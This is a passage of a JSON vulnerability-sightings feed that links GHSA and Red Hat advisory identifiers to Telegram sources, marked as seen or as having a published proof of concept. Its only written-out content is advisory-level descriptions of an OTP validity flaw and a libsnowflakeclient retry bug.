the OTP token period is set to 30 seconds (default). Instead of expiring and deemed unusable around 30 seconds in, the tokens are valid for an additional 30 seconds totaling 1 minute.\nA one time passcode that is valid longer than its expiration time increases the attack window for malicious actors to abuse the system and compromise accounts. Additionally, it increases the attack surface because at any given time, two OTPs are valid.\n\ud83d\udccf Published: 2024-09-09T18:50:36.583Z\n\ud83d\udccf Modified: 2025-05-02T21:52:28.896Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6502\n2. https://access.redhat.com/errata/RHSA-2024:6503\n3. https://access.redhat.com/security/cve/CVE-2024-7318\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2301876", "creation_timestamp": "2025-05-02T22:20:24.000000Z"}, {"uuid": "4a2d3c75-4756-445b-84e9-9694366aaff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2HF-X4Q5-47J3", "type": "seen", "source": "Telegram/4QaIVP4Z6j7I04jn6w3qCKrQ76Fz4EXtpUCBPkRfgX1dqr4", "content": "", "creation_timestamp": "2026-04-15T01:19:29.000000Z"}, {"uuid": "aa4b5e0f-cbcf-45be-b930-5e2d4bbe4f68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V5J3-4Q66-58CF", "type": "seen", "source": "Telegram/4QaIVP4Z6j7I04jn6w3qCKrQ76Fz4EXtpUCBPkRfgX1dqr4", "content": "", "creation_timestamp": "2026-04-15T01:19:29.000000Z"}, {"uuid": "84ffdd23-042c-48f4-97d6-16a74f2042c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FW7-F233-FFR8", "type": "seen", "source": "Telegram/4QaIVP4Z6j7I04jn6w3qCKrQ76Fz4EXtpUCBPkRfgX1dqr4", "content": "", "creation_timestamp": "2026-04-15T01:19:29.000000Z"}, {"uuid": "55feb258-2de4-4f17-9b3d-c8507ffc15fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WG36-WVJ6-R67P", "type": "seen", "source": "Telegram/ajbOyvFAewWZ2L70l5GRQuj2w_RnDYaN4zfpEHfJ_h7NMuY", "content": "", "creation_timestamp": "2026-04-15T23:27:35.000000Z"}, {"uuid": "20ea78bb-a1c4-4146-87f2-e4eb73066ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CH37-53V3-M4CM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13790", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46330\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: libsnowflakeclient is the Snowflake Connector for C/C++. Versions starting from 0.5.0 to before 2.2.0, incorrectly treat malformed requests that caused the HTTP response status code 400, as able to be retried. This could hang the application until SF_CON_MAX_RETRY requests were sent. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-29T04:34:37.061Z\n\ud83d\udccf Modified: 2025-04-29T04:34:37.061Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/libsnowflakeclient/security/advisories/GHSA-ch37-53v3-m4cm\n2. https://github.com/snowflakedb/libsnowflakeclient/pull/882/commits/8120a057e041722e114ed2c5dbed3b5a649f72e2", "creation_timestamp": "2025-04-29T05:11:34.000000Z"}, {"uuid": "f3be82f8-d585-4bb8-8d33-3ef374b14685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVJH-F6P9-5VCF", "type": "published-proof-of-concept", "source": "Telegram/jQJESTxAnDJkcV3IOr4zcsYk9e3AhwwItG0ad6oUuWk-UR8", "content": "", "creation_timestamp": "2026-04-11T03:21:08.000000Z"}, {"uuid": "de3f32fb-5b97-4072-8954-9fc86bbb1e6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "8eb1be63-f171-459f-91bb-ff5506f176de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M627-945G-X7XH", "type": "published-proof-of-concept", "source": "Telegram/i2wIvqy39CRBnxM6Nflxvy-bZIfB5xec6SNNV804lQ_CNEY", "content": "", "creation_timestamp": "2026-04-06T17:30:24.000000Z"}, {"uuid": "6345fe84-b958-4e82-9fa7-95c7408b1504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFMV-VH34-H2X5", "type": "published-proof-of-concept", "source": "Telegram/i2wIvqy39CRBnxM6Nflxvy-bZIfB5xec6SNNV804lQ_CNEY", "content": "", "creation_timestamp": "2026-04-06T17:30:24.000000Z"}, {"uuid": "ea3ce581-dcbc-4b5f-b3e0-374f3b38ff1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8337-3P73-46F4", "type": "published-proof-of-concept", "source": "Telegram/7aT9UpYbZ02LD1lZLti1mg9cdxIpZxAoIiq3Sp7jGujjzO4", "content": "", "creation_timestamp": "2026-04-04T01:19:10.000000Z"}, {"uuid": "bdd89a5e-2a75-47cf-9d14-fdef39b1c1e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-532V-XPQ5-8H95", "type": "published-proof-of-concept", "source": "Telegram/7aT9UpYbZ02LD1lZLti1mg9cdxIpZxAoIiq3Sp7jGujjzO4", "content": "", "creation_timestamp": "2026-04-04T01:19:10.000000Z"}, {"uuid": "8fcc2f65-f25b-42a6-8f82-f8a83233e9e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFQG-HF23-QPW2", "type": "published-proof-of-concept", "source": "Telegram/dDdEoSzblUYmx6y4m1V61c7I55gbgbL59QVpXG1n0DWjbt8", "content": "", "creation_timestamp": "2026-04-04T03:15:52.000000Z"}, {"uuid": "d8cc1250-d342-43ed-a216-651347b73d5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "6fa388b5-0dfc-43b7-95eb-7bc99045b47a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "51338662-0bc5-49da-856f-034b8e70413a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "56b65dbb-b075-42ac-9426-eedcd4518e81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "ad69b279-13a6-44a5-a774-b63087e35c6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "5d29dd4a-1cea-4c77-a9b2-77854e6984a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "86fb4d0d-a7a0-4fc7-85c3-6c09ada3b566", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "3393aa33-4a0e-42ca-9879-b55345ed132d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "2a9abc19-8860-4867-8b0d-f4929688b375", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "b586d688-2754-4ce3-965a-e5116fe7aa39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "6538b508-595f-4878-9a4f-c154d80ee9c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "a32cbf2c-ea4b-4803-96d3-7f2bc575b9ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "bdb5d097-c2de-4395-bf8b-6a4d0e2e6820", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "93abf7c7-927f-41dc-96c3-b45c81ae7bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2C98-648Q-H27H", "type": "published-proof-of-concept", "source": "Telegram/i2wIvqy39CRBnxM6Nflxvy-bZIfB5xec6SNNV804lQ_CNEY", "content": "", "creation_timestamp": "2026-04-06T17:30:24.000000Z"}, {"uuid": "d6aa9e3a-0a8b-4fc5-8638-79e811ae6948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQGF-F4X7-G6WC", "type": "seen", "source": "Telegram/t1F-Vx_aulmn07lvg5ppSTSOssGvqtwkUpkkBVUVRj_FPlk", "content": "", "creation_timestamp": "2026-04-06T19:29:09.000000Z"}, {"uuid": "280c3cd4-a0ed-40fa-9cde-025dac47edbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VC8F-X9PP-WF5P", "type": "seen", "source": "Telegram/4zYpYE5e9_2FkC7Z53Af8gCedtL6FpkxFD5yjbQn9BVECOM", "content": "", "creation_timestamp": "2026-04-01T15:25:32.000000Z"}, {"uuid": "1f7d1d05-e769-4d01-9a0d-59f8b5f6e36d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MPH-V827-F877", "type": "seen", "source": "Telegram/4zYpYE5e9_2FkC7Z53Af8gCedtL6FpkxFD5yjbQn9BVECOM", "content": "", "creation_timestamp": "2026-04-01T15:25:32.000000Z"}, {"uuid": "f5c30816-9b3b-4ce7-85e7-3b4754c251f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R33W-C82V-X5V7", "type": "seen", "source": "Telegram/coMrEhctUArWfU_1Esx58b8AZjuGB_2Ws5YwoScTDx0IuKI", "content": "", "creation_timestamp": "2026-04-01T23:27:52.000000Z"}, {"uuid": "ca4448d1-4458-40d5-9b5a-b184308520d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q5M-JFC4-WC92", "type": "seen", "source": "Telegram/asfs2Uk_HDA2dEAWxK7wNvn0OefGesF-RFz1ocNui3XpVnY", "content": "", "creation_timestamp": "2026-04-02T17:37:18.000000Z"}, {"uuid": "3d2dec3a-c59c-40ed-b54e-1861b5e871b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "bb34da31-5a65-4ebf-aff7-de5020fd539e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "8f5d69fb-fbfa-477a-a923-427785ad80f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "c0eed227-5d42-4884-aa4c-0b89672b0d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "5de591f4-4a4c-4984-8c66-6f389b0a4eec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "477c898b-02e4-431e-9746-a23e522649b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "4de9fd97-7209-4e4f-ab1b-48676a1ecf19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "f06e2d66-835e-45d0-a812-6111bbb30996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "be9c3f9a-f3ff-48ca-9a33-f85f34aac6af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "77e930f7-5a20-49c6-8327-ea1264f992e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79C4-CVV7-4QM3", "type": "published-proof-of-concept", "source": "Telegram/FD_1XDPHxmeq4cPhZAsKic1sVLDUHGuIRMXt4NvJcjYqn2U", "content": "", "creation_timestamp": "2026-04-06T19:28:12.000000Z"}, {"uuid": "503b5897-5ec8-43cb-977a-9c8f7769bccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ4J-X5WW-CWH9", "type": "published-proof-of-concept", "source": "Telegram/FD_1XDPHxmeq4cPhZAsKic1sVLDUHGuIRMXt4NvJcjYqn2U", "content": "", "creation_timestamp": "2026-04-06T19:28:12.000000Z"}, {"uuid": "8995d507-db96-4bdc-94a4-0b8cd996ea2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R7F-9XPJ-JMR7", "type": "published-proof-of-concept", "source": "Telegram/FD_1XDPHxmeq4cPhZAsKic1sVLDUHGuIRMXt4NvJcjYqn2U", "content": "", "creation_timestamp": "2026-04-06T19:28:12.000000Z"}, {"uuid": "4126c364-64f0-4e23-981e-fe8a18acab83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QCMW-8MM4-4P28", "type": "published-proof-of-concept", "source": "Telegram/ECjdy8s76GZ_Bal_wnIB79ij56tbajMepr_VumTyCn-zmzM", "content": "", "creation_timestamp": "2026-04-06T19:28:45.000000Z"}, {"uuid": "ec842658-bea7-46e6-8d68-a1bf587375b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR2G-RHM5-Q4JR", "type": "published-proof-of-concept", "source": "Telegram/ECjdy8s76GZ_Bal_wnIB79ij56tbajMepr_VumTyCn-zmzM", "content": "", "creation_timestamp": "2026-04-06T19:28:45.000000Z"}, {"uuid": "7028ac4a-7f83-48f3-afe7-c37a632cdb45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24JW-F244-QFPP", "type": "published-proof-of-concept", "source": "Telegram/nyeqn3leA21ahM9eDPOdcOfg88eaiSN6Cc1j2Af2p1JdwTU", "content": "", "creation_timestamp": "2026-04-08T23:32:54.000000Z"}, {"uuid": "bee31533-30b2-49a7-9101-756121f53330", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VGC-VFH2-RW75", "type": "published-proof-of-concept", "source": "Telegram/twGuufhd-m5atHTFcaEGq3zek_WSptxjF-dOJS4SFpStcSg", "content": "", "creation_timestamp": "2026-04-08T23:33:17.000000Z"}, {"uuid": "b3f222ed-d773-4e11-961f-61447da46a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F292-66H9-FPMF", "type": "published-proof-of-concept", "source": "Telegram/Dz-0u6C1u9T0WCXCs4W5hHtkLp3TtNEV9yEjsLh0_yFvD1Y", "content": "", "creation_timestamp": "2026-04-09T01:27:32.000000Z"}, {"uuid": "3c75e180-8f94-434f-af4a-b2cae9c27815", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWG5-X759-7WJG", "type": "published-proof-of-concept", "source": "Telegram/Dz-0u6C1u9T0WCXCs4W5hHtkLp3TtNEV9yEjsLh0_yFvD1Y", "content": "", "creation_timestamp": "2026-04-09T01:27:32.000000Z"}, {"uuid": "30ae97de-94e2-415e-9312-8c0770dffabd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32VR-5GCF-3PW2", "type": "published-proof-of-concept", "source": "Telegram/Dz-0u6C1u9T0WCXCs4W5hHtkLp3TtNEV9yEjsLh0_yFvD1Y", "content": "", "creation_timestamp": "2026-04-09T01:27:32.000000Z"}, {"uuid": "f4e9c858-31d3-4fd7-81ab-bf06ecbd880e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X636-4JX6-XC4W", "type": "seen", "source": "Telegram/gdbQBvnuOgX0zlyJL9kfjxoCoTp9WBTGn5-zeTA4spKkwcA", "content": "", "creation_timestamp": "2026-03-26T21:36:40.000000Z"}, {"uuid": "d4d52776-a0c3-4559-ac09-468ae6295d2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV74-W6Q7-H8XR", "type": "seen", "source": "Telegram/gdbQBvnuOgX0zlyJL9kfjxoCoTp9WBTGn5-zeTA4spKkwcA", "content": "", "creation_timestamp": "2026-03-26T21:36:40.000000Z"}, {"uuid": "e5e19eee-ebe6-48ee-ac53-23c17f1992c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M7C-JJQC-R522", "type": "seen", "source": "Telegram/gdbQBvnuOgX0zlyJL9kfjxoCoTp9WBTGn5-zeTA4spKkwcA", "content": "", "creation_timestamp": "2026-03-26T21:36:40.000000Z"}, {"uuid": "4d202519-8dab-40d4-846c-3cc278b7f659", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C38G-MX2C-9WF2", "type": "seen", "source": "Telegram/knkV6U7RC4OpKxR0GhJKoJS2C9Z__Lnhn5rNmC0CAguDvjk", "content": "", "creation_timestamp": "2026-03-26T21:36:49.000000Z"}, {"uuid": "14267689-f848-46ca-a9c7-39c51797ec2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "c0b7dafc-daa6-4a81-abef-00c9cb450713", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "d89ed8ad-fa15-464a-8a1c-854155a69b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GC8Q-2GW7-QJ7W", "type": "published-proof-of-concept", "source": "Telegram/b7kqkVlyu_pyGML8IRNuJF5vW46V1gBKnrWAnE54KrYglqM", "content": "", "creation_timestamp": "2026-04-07T19:35:02.000000Z"}, {"uuid": "734afed9-1f87-4604-84fd-d8c9e86e658b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGFM-5Q4W-P93G", "type": "seen", "source": "Telegram/d9ntGhgAXUNib3HVhoGCh5gTeuhEkXLp8JxGb0TRA4y7Jks", "content": "", "creation_timestamp": "2026-04-07T19:35:24.000000Z"}, {"uuid": "9da4b5f8-af04-433e-b310-9300bc695b93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PR46-2V3C-5356", "type": "seen", "source": "Telegram/ob3ye0FCdfhceb6CimILWC3jRIWmZERT_bGMc-OQRsW6HR0", "content": "", "creation_timestamp": "2026-04-07T23:21:25.000000Z"}, {"uuid": "97663145-aa78-44b6-b5c2-5c64f5a019da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JXR-PR72-R468", "type": "seen", "source": "Telegram/ob3ye0FCdfhceb6CimILWC3jRIWmZERT_bGMc-OQRsW6HR0", "content": "", "creation_timestamp": "2026-04-07T23:21:25.000000Z"}, {"uuid": "59e1fb92-591a-4b21-9d28-bd521f4738c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "1ec31c85-935c-41e6-a99e-52083c2b1e3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WH4C-J3R5-MJHP", "type": "published-proof-of-concept", "source": "Telegram/zJs9VhJAI5JOvrL4hzeWnrOleMDgHArbbwhOuzjaL80cudA", "content": "", "creation_timestamp": "2026-04-02T19:27:20.000000Z"}, {"uuid": "7b2fe4aa-4e44-477d-af4c-4c9d0afa6469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 